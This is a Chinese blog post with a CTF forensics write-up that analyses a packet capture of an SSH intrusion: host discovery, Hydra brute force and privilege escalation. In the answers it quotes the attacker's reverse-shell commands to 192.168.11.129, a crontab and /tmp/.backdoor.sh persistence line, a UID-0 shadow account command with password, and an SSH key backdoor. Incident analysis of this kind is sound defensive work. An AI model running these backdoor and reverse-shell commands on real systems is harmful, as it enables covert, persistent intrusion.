<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>好靶场杯第一届综合赛-古法赛道-SSH | Moriiの博客</title><meta name="keywords" content="CTF"><meta name="author" content="Morii"><meta name="copyright" content="Morii"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="SSH WriteUp1. 攻击者的 IP 地址是什么？  根据通信关系图可以知道受害者ip和攻击者ip 192.168.11.129 2. 受害服务器的 IP 地址是什么？192.168.11.96 3. 攻击者对目标网段进行了存活主机探测，请写出扫描的网段。攻击者和受害者都是在同一网段内，所以扫描的网段**192.168.11.0&#x2F;24** 攻击者向 192.168.11.0 ~ 192.16">
<meta property="og:type" content="article">
<meta property="og:title" content="好靶场杯第一届综合赛-古法赛道-SSH">
<meta property="og:url" content="https://drume2.github.io/posts/cfac8c7a.html">
<meta property="og:site_name" content="Moriiの博客">
<meta property="og:description" content="SSH WriteUp1. 攻击者的 IP 地址是什么？  根据通信关系图可以知道受害者ip和攻击者ip 192.168.11.129 2. 受害服务器的 IP 地址是什么？192.168.11.96 3. 攻击者对目标网段进行了存活主机探测，请写出扫描的网段。攻击者和受害者都是在同一网段内，所以扫描的网段**192.168.11.0&#x2F;24** 攻击者向 192.168.11.0 ~ 192.16">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp">
<meta property="article:published_time" content="2026-07-19T07:08:24.000Z">
<meta property="article:modified_time" content="2026-07-20T03:45:36.026Z">
<meta property="article:author" content="Morii">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp"><link rel="shortcut icon" href="https://imgtu.com/uploads/1jto6hwz/r-file_64e053.webp"><link rel="canonical" href="https://drume2.github.io/posts/cfac8c7a"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: {"limitDay":500,"position":"top","messagePrev":"一年之内的产物","messageNext":"技术可能存在过期"},
  highlight: {"plugin":"prismjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '好靶场杯第一届综合赛-古法赛道-SSH',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2026-07-20 11:45:36'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link defer rel="stylesheet" href="/css/customm.css" ><link defer rel="stylesheet" href="https://npm.elemecdn.com/xianqi-hexo/css/icon.css"><link defer rel="stylesheet" href="https://cdn.jsdelivr.net/gh/HCLonely/images@master/others/heartbeat.min.css"><link defer rel="stylesheet" href="https://npm.elemecdn.com/xianqi-hexo/css/background.css"><link defer rel="stylesheet" href="https://npm.elemecdn.com/xianqi-hexo/css/index_ee.css"><link defer rel="stylesheet" href="https://cdn.jsdelivr.net/gh/sviptzk/HexoStaticFile@master/Hexo/css/flink.min.css"><meta name="generator" content="Hexo 6.2.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://a1.boltp.com/2026/07/23/6a61acb003cff.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">143</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">7</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">7</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-folder-open"></i><span> 归档</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/artitalk/"><i class="fa-fw fas fa-book"></i><span> 说说</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时轴</span></a></li><li><a class="site-page child" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></li></ul></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/List/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/List/gallery/"><i class="fa-fw fas fa-image"></i><span> 相册</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/comments/"><i class="fa-fw fas fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于我</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Moriiの博客</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-folder-open"></i><span> 归档</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/artitalk/"><i class="fa-fw fas fa-book"></i><span> 说说</span></a></li><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时轴</span></a></li><li><a class="site-page child" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></li></ul></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/List/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/List/gallery/"><i class="fa-fw fas fa-image"></i><span> 相册</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/comments/"><i class="fa-fw fas fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于我</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">好靶场杯第一届综合赛-古法赛道-SSH</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2026-07-19T07:08:24.000Z" title="发表于 2026-07-19 15:08:24">2026-07-19</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2026-07-20T03:45:36.026Z" title="更新于 2026-07-20 11:45:36">2026-07-20</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/CTF/">CTF</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="好靶场杯第一届综合赛-古法赛道-SSH"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="SSH-WriteUp"><a href="#SSH-WriteUp" class="headerlink" title="SSH WriteUp"></a>SSH WriteUp</h1><h3 id="1-攻击者的-IP-地址是什么？"><a href="#1-攻击者的-IP-地址是什么？" class="headerlink" title="1. 攻击者的 IP 地址是什么？"></a>1. 攻击者的 IP 地址是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9822589f7.png" alt="image-20260719144617463">

<p>根据通信关系图可以知道受害者ip和攻击者ip</p>
<p><strong><code>192.168.11.129</code></strong></p>
<h3 id="2-受害服务器的-IP-地址是什么？"><a href="#2-受害服务器的-IP-地址是什么？" class="headerlink" title="2. 受害服务器的 IP 地址是什么？"></a>2. 受害服务器的 IP 地址是什么？</h3><p><strong><code>192.168.11.96</code></strong></p>
<h3 id="3-攻击者对目标网段进行了存活主机探测，请写出扫描的网段。"><a href="#3-攻击者对目标网段进行了存活主机探测，请写出扫描的网段。" class="headerlink" title="3. 攻击者对目标网段进行了存活主机探测，请写出扫描的网段。"></a>3. 攻击者对目标网段进行了存活主机探测，请写出扫描的网段。</h3><p>攻击者和受害者都是在同一网段内，所以扫描的网段**<code>192.168.11.0/24</code>**</p>
<p>攻击者向 192.168.11.0 ~ 192.168.11.255 共 256 个 IP 发送了 ARP 请求。</p>
<h3 id="4-攻击者存活主机探测使用了什么协议？共发现多少台存活主机？"><a href="#4-攻击者存活主机探测使用了什么协议？共发现多少台存活主机？" class="headerlink" title="4. 攻击者存活主机探测使用了什么协议？共发现多少台存活主机？"></a>4. 攻击者存活主机探测使用了什么协议？共发现多少台存活主机？</h3><ul>
<li>协议：<strong>ARP</strong></li>
<li>存活主机：<strong>6 台</strong>（192.168.11.1、192.168.11.2、192.168.11.96、192.168.11.107、192.168.11.129、192.168.11.254）</li>
<li><img src="https://a1.boltp.com/2026/07/20/6a5d98223e158.png" alt="image-20260719144513454"></li>
</ul>
<h3 id="5-受害服务器开放了哪些端口？"><a href="#5-受害服务器开放了哪些端口？" class="headerlink" title="5. 受害服务器开放了哪些端口？"></a>5. 受害服务器开放了哪些端口？</h3><p><strong><code>22,80,443</code></strong></p>
<p>攻击者对 192.168.11.96 扫描了 1000 个端口，仅 22、80、443 回复 SYN-ACK。</p>
<img src="https://a1.boltp.com/2026/07/20/6a5d982242719.png" alt="image-20260719144524324">

<h3 id="6-攻击者使用了什么工具进行-SSH-暴力破解？（写出工具名称和-SSH-客户端标识）"><a href="#6-攻击者使用了什么工具进行-SSH-暴力破解？（写出工具名称和-SSH-客户端标识）" class="headerlink" title="6. 攻击者使用了什么工具进行 SSH 暴力破解？（写出工具名称和 SSH 客户端标识）"></a>6. 攻击者使用了什么工具进行 SSH 暴力破解？（写出工具名称和 SSH 客户端标识）</h3><p><strong><code>Hydra-SSH-2.0-libssh_0.11.3</code></strong></p>
<p>暴力破解工具为 <strong>Hydra</strong>，其 SSH 模块底层调用 libssh 0.11.3 库，SSH 客户端标识为 <code>SSH-2.0-libssh_0.11.3</code>。<br>Hydra 连接特征：大量短时 TCP 连接，每个连接一次密码尝试即断开，连接速率呈波次分布，被服务器限流后返回 <code>Not allowed at this time</code>。</p>
<h3 id="7-受害服务器的-SSH-服务版本是什么？"><a href="#7-受害服务器的-SSH-服务版本是什么？" class="headerlink" title="7. 受害服务器的 SSH 服务版本是什么？"></a>7. 受害服务器的 SSH 服务版本是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9822c35c5.png" alt="image-20260719144821231">

<p><strong><code>SSH-2.0-OpenSSH_10.0p2 Ubuntu-5ubuntu5.4</code></strong></p>
<h3 id="8-攻击者暴力破解共尝试了多少次密码？"><a href="#8-攻击者暴力破解共尝试了多少次密码？" class="headerlink" title="8. 攻击者暴力破解共尝试了多少次密码？"></a>8. 攻击者暴力破解共尝试了多少次密码？</h3><p><strong><code>30</code> 次</strong></p>
<p>分类统计：</p>
<ul>
<li>8 个连接完成完整 SSH 握手（发送 libssh banner + 接收服务器 banner + KEX + 认证）</li>
<li>12 个连接发送 libssh banner 后被服务器返回 <code>Not allowed at this time</code> 拒绝</li>
<li>10 个 TCP 探测连接（仅 SYN，无 SSH 数据）</li>
<li>排除：1 个端口扫描器（37853）、3 个手动登录（52602&#x2F;46646&#x2F;35906）、1 个 Banner 抓取（50598）</li>
</ul>
<p>共 35 个去重端口 - 5 个排除 &#x3D; <strong>30 次爆破尝试</strong>。</p>
<h3 id="9-攻击者暴力破解成功后登录的用户名是什么？"><a href="#9-攻击者暴力破解成功后登录的用户名是什么？" class="headerlink" title="9. 攻击者暴力破解成功后登录的用户名是什么？"></a>9. 攻击者暴力破解成功后登录的用户名是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d982293b83.png" alt="image-20260719145623422">

<p>登陆上的用户名就是sanjiu，然后才是root</p>
<p><strong><code>sanjiu</code></strong></p>
<h3 id="10-攻击者进入反弹-Shell-后执行的第一条命令是什么？"><a href="#10-攻击者进入反弹-Shell-后执行的第一条命令是什么？" class="headerlink" title="10. 攻击者进入反弹 Shell 后执行的第一条命令是什么？"></a>10. 攻击者进入反弹 Shell 后执行的第一条命令是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d98225d3b2.png" alt="image-20260719145654719">

<p><strong><code>whoami</code></strong></p>
<p>反弹 Shell 连接到 192.168.11.129:4444 后，攻击者首先升级 PTY（<code>python3 -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code>），第一条侦察命令为 <code>whoami</code>。</p>
<h3 id="11-攻击者一共建立了几次反弹-Shell-连接？"><a href="#11-攻击者一共建立了几次反弹-Shell-连接？" class="headerlink" title="11. 攻击者一共建立了几次反弹 Shell 连接？"></a>11. 攻击者一共建立了几次反弹 Shell 连接？</h3><p><strong><code>2</code> 次</strong></p>
<ul>
<li>第一次：192.168.11.96:36842 → 192.168.11.129:4444（sanjiu 用户）</li>
<li>第二次：192.168.11.96:56908 → 192.168.11.129:4444（提权至 root）</li>
</ul>
<h3 id="12-受害服务器的主机名是什么？"><a href="#12-受害服务器的主机名是什么？" class="headerlink" title="12. 受害服务器的主机名是什么？"></a>12. 受害服务器的主机名是什么？</h3><pre class="line-numbers language-none"><code class="language-none">┌──(root㉿kali)-[&#x2F;mnt&#x2F;hgfs&#x2F;share&#x2F;ssh]
└─# tshark -r ssh.pcap -Y &quot;tcp.port&#x3D;&#x3D;4444 &amp;&amp; tcp.payload&quot; \
  -T fields -e tcp.payload | xxd -r -p
Running as user &quot;root&quot; and group &quot;root&quot;. This could be dangerous.
bash: 无法设定终端进程组 (5216): 对设备不适当的 ioctl 操作
bash: 此 shell 中无任务控制
sanjiu@sanjiu-VMware-Virtual-Platform:~$<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong><code>sanjiu-VMware-Virtual-Platform</code></strong></p>
<h3 id="13-攻击者手动登录时使用的-SSH-客户端标识是什么？"><a href="#13-攻击者手动登录时使用的-SSH-客户端标识是什么？" class="headerlink" title="13. 攻击者手动登录时使用的 SSH 客户端标识是什么？"></a>13. 攻击者手动登录时使用的 SSH 客户端标识是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9822c35c5.png" alt="image-20260719144821231">

<p><strong><code>SSH-2.0-OpenSSH_10.2p1 Debian-3</code></strong></p>
<p>爆破成功后，攻击者使用标准 OpenSSH 客户端（Debian 10.2p1）手动登录（端口 52602、46646、35906）。</p>
<h3 id="14-反弹-Shell-使用的端口号是什么？"><a href="#14-反弹-Shell-使用的端口号是什么？" class="headerlink" title="14. 反弹 Shell 使用的端口号是什么？"></a>14. 反弹 Shell 使用的端口号是什么？</h3><p><strong><code>4444</code></strong></p>
<h3 id="15-反弹-Shell-的连接方向是什么？"><a href="#15-反弹-Shell-的连接方向是什么？" class="headerlink" title="15. 反弹 Shell 的连接方向是什么？"></a>15. 反弹 Shell 的连接方向是什么？</h3><p><strong>受害服务器（192.168.11.96）主动连接攻击者（192.168.11.129）</strong></p>
<p>攻击者在本地监听 4444，受害服务器反向连接。</p>
<h3 id="16-攻击者将-root-密码修改为了什么？"><a href="#16-攻击者将-root-密码修改为了什么？" class="headerlink" title="16. 攻击者将 root 密码修改为了什么？"></a>16. 攻击者将 root 密码修改为了什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9823a4bd5.png" alt="image-20260719150154604">

<p><strong><code>sanjiu@@@123</code></strong></p>
<h3 id="17-攻击者创建的影子账户用户名和-UID-分别是什么？"><a href="#17-攻击者创建的影子账户用户名和-UID-分别是什么？" class="headerlink" title="17. 攻击者创建的影子账户用户名和 UID 分别是什么？"></a>17. 攻击者创建的影子账户用户名和 UID 分别是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9823f29a5.png" alt="image-20260719150345333">

<p><strong><code>sanJiu-0</code></strong></p>
<p>命令：<code>useradd -o -u 0 -g 0 -M -d /root -s /bin/bash sanJiu</code><br>密码：<code>admin123456@@@</code></p>
<h3 id="18-攻击者写入的-Crontab-后门完整内容是什么？"><a href="#18-攻击者写入的-Crontab-后门完整内容是什么？" class="headerlink" title="18. 攻击者写入的 Crontab 后门完整内容是什么？"></a>18. 攻击者写入的 Crontab 后门完整内容是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d98246c068.png" alt="image-20260719150516346">

<p><strong><code>*/10 * * * * root bash -i &gt;&amp; /dev/tcp/192.168.11.129/9999 0&gt;&amp;1</code></strong></p>
<h3 id="19-攻击者-Crontab-后门的回连端口是什么？"><a href="#19-攻击者-Crontab-后门的回连端口是什么？" class="headerlink" title="19. 攻击者 Crontab 后门的回连端口是什么？"></a>19. 攻击者 Crontab 后门的回连端口是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d9823dba37.png" alt="image-20260719150411341">

<p><strong><code>9999</code></strong></p>
<h3 id="20-攻击者在受害机上创建的隐藏后门脚本完整路径是什么？"><a href="#20-攻击者在受害机上创建的隐藏后门脚本完整路径是什么？" class="headerlink" title="20. 攻击者在受害机上创建的隐藏后门脚本完整路径是什么？"></a>20. 攻击者在受害机上创建的隐藏后门脚本完整路径是什么？</h3><p><strong><code>/tmp/.backdoor.sh</code></strong></p>
<p>内容：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>
<span class="token function">bash</span> -i <span class="token operator">>&amp;</span> /dev/tcp/192.168.11.129/9999 <span class="token operator"><span class="token file-descriptor important">0</span>></span><span class="token file-descriptor important">&amp;1</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="21-攻击者写入-SSH-公钥后门的公钥文件完整路径是什么？"><a href="#21-攻击者写入-SSH-公钥后门的公钥文件完整路径是什么？" class="headerlink" title="21. 攻击者写入 SSH 公钥后门的公钥文件完整路径是什么？"></a>21. 攻击者写入 SSH 公钥后门的公钥文件完整路径是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d98245d07f.png" alt="image-20260719150459783">

<p><strong><code>/root/.ssh/authorized_keys</code></strong></p>
<p>公钥内容：<code>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7FakeKeyForCTF kali@kali</code></p>
<h3 id="22-受害机-x2F-etc-x2F-shadow-文件中-root-用户的密码哈希值是什么？"><a href="#22-受害机-x2F-etc-x2F-shadow-文件中-root-用户的密码哈希值是什么？" class="headerlink" title="22. 受害机 &#x2F;etc&#x2F;shadow 文件中 root 用户的密码哈希值是什么？"></a>22. 受害机 &#x2F;etc&#x2F;shadow 文件中 root 用户的密码哈希值是什么？</h3><img src="https://a1.boltp.com/2026/07/20/6a5d982400cfb.png" alt="image-20260719150431783">

<p><strong><code>$y$j9T$HAiWkWk/MXH2ZeZDj9uXl1$jr4kDa9qVoVGC9kJb2U7tK7nHRcWQA/VdB6OoMl8d6C</code></strong></p>
<p>yescrypt 格式，对应密码 <code>sanjiu@@@123</code>。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://drume2.github.io">Morii</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://drume2.github.io/posts/cfac8c7a.html">https://drume2.github.io/posts/cfac8c7a.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://drume2.github.io" target="_blank">Moriiの博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF/">CTF</a></div><div class="post_share"><div class="social-share" data-image="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/gh/overtrue/share.js@master/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/896ce370.html"><img class="prev-cover" src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">好靶场杯第一届综合赛-古法赛道-FTP</div></div></a></div><div class="next-post pull-right"><a href="/posts/7603c458.html"><img class="next-cover" src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">HMV-Iot</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/896ce370.html" title="好靶场杯第一届综合赛-古法赛道-FTP"><img class="cover" src="https://npm.elemecdn.com/xianqi-hexo/imgg/2.webp" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2026-07-19</div><div class="title">好靶场杯第一届综合赛-古法赛道-FTP</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div><div id="comment-switch"><span class="first-comment">Twikoo</span><span class="switch-btn"></span><span class="second-comment">Valine</span></div></div><div class="comment-wrap"><div><div id="twikoo-wrap"></div></div><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://a1.boltp.com/2026/07/23/6a61acb003cff.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Morii</div><div class="author-info__description">博客因兴趣诞生,在不断完善中</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">143</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">7</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">7</div></a></div><a id="card-info-btn"><i class="fab fa-home"></i><span>个人主页</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/Drume1/drume1.github.io" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="tencent://AddContact/?fromId=45&amp;fromSubId=1&amp;subcmd=all&amp;uin=1159927667&amp;website=www.qtxml.cn" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">兴趣爱好才是最大的动力，何不与我共同来攀知识高峰，品翘楚美人！</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSH-WriteUp"><span class="toc-number">1.</span> <span class="toc-text">SSH WriteUp</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84-IP-%E5%9C%B0%E5%9D%80%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.1.</span> <span class="toc-text">1. 攻击者的 IP 地址是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%8F%97%E5%AE%B3%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84-IP-%E5%9C%B0%E5%9D%80%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.0.2.</span> <span class="toc-text">2. 受害服务器的 IP 地址是什么？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%94%BB%E5%87%BB%E8%80%85%E5%AF%B9%E7%9B%AE%E6%A0%87%E7%BD%91%E6%AE%B5%E8%BF%9B%E8%A1%8C%E4%BA%86%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%8E%A2%E6%B5%8B%EF%BC%8C%E8%AF%B7%E5%86%99%E5%87%BA%E6%89%AB%E6%8F%8F%E7%9A%84%E7%BD%91%E6%AE%B5%E3%80%82"><span class="toc-number">1.0.3.</span> <span class="toc-text">3. 攻击者对目标网段进行了存活主机探测，请写出扫描的网段。</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%94%BB%E5%87%BB%E8%80%85%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%8E%A2%E6%B5%8B%E4%BD%BF%E7%94%A8%E4%BA%86%E4%BB%80%E4%B9%88%E5%8D%8F%E8%AE%AE%EF%BC%9F%E5%85%B1%E5%8F%91%E7%8E%B0%E5%A4%9A%E5%B0%91%E5%8F%B0%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%EF%BC%9F"><span class="toc-number">1.0.4.</span> <span class="toc-text">4. 攻击者存活主机探测使用了什么协议？共发现多少台存活主机？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E5%8F%97%E5%AE%B3%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BC%80%E6%94%BE%E4%BA%86%E5%93%AA%E4%BA%9B%E7%AB%AF%E5%8F%A3%EF%BC%9F"><span class="toc-number">1.0.5.</span> <span class="toc-text">5. 受害服务器开放了哪些端口？</span></a></li><li class="toc-item toc-level-3"><a 